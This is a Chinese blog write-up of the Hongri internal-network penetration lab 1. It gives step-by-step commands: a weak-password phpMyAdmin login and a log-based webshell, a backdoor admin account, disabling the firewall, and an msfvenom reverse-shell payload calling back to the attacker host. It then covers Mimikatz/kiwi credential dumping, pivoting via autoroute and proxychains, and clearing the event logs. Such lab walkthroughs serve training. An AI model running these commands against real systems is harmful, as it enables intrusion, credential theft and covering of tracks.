【内网横向】红日靶场1

已于 2024-02-21 22:38:57 修改
阅读量3.3k 收藏 2
点赞数 2
分类专栏: 内网横向 文章标签: 运维
于 2022-03-31 23:48:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48201589/article/details/123886838
版权

内网渗透 权限提升 横向移动 Meterpreter 永恒之蓝
关键词由CSDN通过智能技术生成

记一次内网渗透

红日靶场下载地址:漏洞详情

靶场地址分配:

模拟外网网段:192.168.174.0/24

模拟内网网段:192.168.52.0/24

攻击机:

kali:192.168.174.131

靶机:

域控服务器2008:192.168.52.138(内网)

域成员2003:192.168.52.141(内网)

Win7: 192.168.52.143(内网)

192.168.174.130(外网)

1.信息收集

使用nmap对192.168.174.130进行扫描

对目录进行扫描,发现phpmyadmin页面

2.GETSHELL

弱口令root/root登录界面

使用日志漏洞

开启日志功能,并设置日志路径

写入一句话木马,并用蚁剑链接

在后台建立新用户,并赋予管理员权限--权限维持

net user 账户 密码 /add
管理员权限,所有直接加
net localgroup administrators admin /add

3.后渗透

关闭防火墙

netsh advfirewall show allprofile state
netsh advfirewall set allprofiles state off

开启3389

run post/windows/manage/enable_rdp
rdesktop 192.168.174.130:3389

msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4444 -f exe -o brian.exe

将木马上传到肉鸡

开启msfconsole并监听:

use exploit/multi/handler

设置tcp监听:

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.174.131

exploit

运行肉鸡上的木马

信息查看

 whoami                                                         # 查看当前用户名
 whoami /all                                                    # 获取域SID
 ipconfig /all                                                  # 网络配置文件
 route print                                                    # 打印路由信息
 arp -a                                                   # 查看arp缓存,可以发现内网主机
 systeminfo                                                     # 操作系统信息
 echo %PROCESSOR_ARCHITECTURE%                                  # 系统体系架构
 tasklist /v                                                    # 本机进程
 net statistics workstation                                     # 主机开机时间
 net user                                                        # 查看本地用户
 net localgroup administrators                        # 查看本地管理员组(通常包含域用户)
 net user xxx                                                    # 查看指定用户详细信息
​

进程迁移

ps migrate 512 # 默认是加载32位的系统,所以如果目标主机是64位系统的话,需要将进程迁移到一个64位程序的进程中 load kiwi # 加载kiwi模块 creds_all # 列举系统中的明文密码

权限提升

4.横向移动

配置静态路由(可以后台运行,使用永恒之蓝打域控)

run autoroute 192.168.52.0/24

使用代理(为了在msf之外访问内网,只好设计一个代理)

设置代理服务器

配置代理文件

vim /etc/proxychains.conf

对内网进行端口扫描

5.清理痕迹

meterperter清除日志功能: clearev #清除windows中的应用程序日志、系统日志、安全日志

Hello_Brian
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红日靶场(一)
weixin_55554070的博客
03-01 5894
一、环境配置 1.靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 2.环境IP配置: kali:net模式(外网):192.168.159.131 win7: VMnet1(内网):192.168.52.143 net模式(外网):192.168.159.136 3.测试连通性: win7能ping通所有主机,所有主机都ping不通win7,因为win7的防火墙过滤了icmp 4.开启web服务 在win7上使用phpst
红日靶场第一关
红队是青春
11-16 7087
红日靶场第一关 一、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
红日渗透靶场测试(1)
最新发布
2302_78903258的博客
06-18 1082
我是根据此位博客的内容进行操作的,大家如果看不懂我内容的话,可以看看这位博客,里面的环境配置很详细。
红日靶场1
woshicainiao666的博客
01-13 1559
我们可以看到使用kiwi模块,爆不出密码,是因为kiwi默认是32位的系统,而win7是64位的系统,不兼容,所以我们需要将meterpreter模块迁移到64位的进程中。net config workstation ---------查看当前的域的信息。net view /domain ---------查看本机的域。第一个网卡选择------VMwear1(仅主机模式)net time /domain ----------查找域控。net view ---------查看当前域中计算机的名称。
红日靶场(一)
qq_58091216的博客
05-01 3128
红一1. 实验环境拓扑如下:2. 下载好镜像文件,下载地址:(13G,需要百度网盘会员)3.需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。网络配置完成,这三台虚拟主机默认开机密码都是。
红日靶场
qq_45751902的博客
09-23 863
win7VMnet 1(仅主机):192.168.52.129注:phphstudy需要win7重启才可以打开win7的nat地址需要手工配置(至少我的要这样)win2003VMnet 1(仅主机):192.168.52.141win2008VMnet 1(仅主机):192.168.52.138网络连接状态win7可以ping通所有主机,但是他们ping不通win7的,所以猜测win7开启了防火墙并过滤了ICMP数据包,因此kali用nmap时要使用-sS。
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
032-内网横向移动学习备忘录1
08-04
1 . 1 扩 展 图 1 . 2 络 环 境 1 . 3 简 述 2 . 1 利 条 件 2 . 2 利 式 2 . 3 I P C 相 关 的 命 令 3
企业内网横向渗透检测和拦截实践.pdf
09-11
企业内网横向渗透检测和拦截实践 安全众测 网络安全 法律法规 渗透测试 移动安全
国光的手把手带你用 SSRF 打穿内网靶场源码.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
当存在两个内网(如内网1和内网2)时,它们可能由于网络结构或安全策略而无法直接通信。这时,正向和反向协议通信连接问题就显得尤为重要。正向代理允许内网客户端通过代理服务器访问外网资源,而反向代理则让外网...
绕过限制对某内网进行横向移动.pdf
11-25
内网渗透
内网渗透讲义(1).pdf
06-30
在渗透测试过程中,我们经常会遇到以下场景:某处于域中的服务器通过路由做端口映射,对外提供web服务,我们通过web脚本漏洞获得了该主机的system权限,如果甲方有进一步的内网渗透测试需求,以证明企业所面临的巨大...
linux内网渗透1
08-03
综上所述,此过程展示了Linux内网渗透的基本步骤,包括漏洞利用、权限提升、信息收集、横向移动以及内网资源的探测。同时也揭示了网络安全的重要性,尤其是对敏感信息的保护和良好的系统管理实践。对于IT安全从业...
国光师傅的SSRF靶场docker环境.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
[渗透测试]红日靶场1
weixin_47224111的博客
10-25 483
因为已经知道绝对路径 通过into outfile 尝试写入木马 但是失败了 show global variables like '%secure% secure_file_priv的值是空的 说明不允许mysql导入导出 且这个值是不能用命令来修改的,修改只能通过mysql.ini在mysqld下添加secure_file_priv = LINUX下是在/etc/my.cnf的mysqld下面添加local-infile=0 选项 我们可以利用日志来写shell show global variable
红日靶场1(渗透记录)
b1n的博客
09-12 1328
分享的靶机实战环境,这篇博客是为自己记录的同时分享出来让大佬们共同检阅,如有问题,还请多多指教。
红日靶场1实战经验
热门推荐
YouthBelief的博客
10-27 1万+
红日靶场一0x00前言0x01环境搭建0x02web渗透1 信息收集1.1探测内网存活1.2端口扫描1.2.1 masscan扫描1.2.2 nmap扫描1.2.3 访问80端口1.2.4 目录爆破 看还存在扫描页面服务漏洞利用思路2 漏洞利用2.1 探测phpmyadmin页面2.1 phpmyadmin漏洞利用2.1.1 看是否可以写入文件2.1.2 尝试用日志写入木马getshell2.1.3 蚁剑连接3 拿下webshell后信息收集3.1 是否存在域3.2 网络连接情况 进程 杀软 服务 是否可以
红日靶场ping不通内网
08-17
1. 防火墙设置:确保您的内网防火墙未阻止来自红日靶场IP的ping请求。请检查防火墙规则并确保允许ping请求通过。 2. 内网路由设置:检查您的内网路由设置,确保正确配置了与红日靶场之间的路由。如果路由不正确,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello_Brian

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值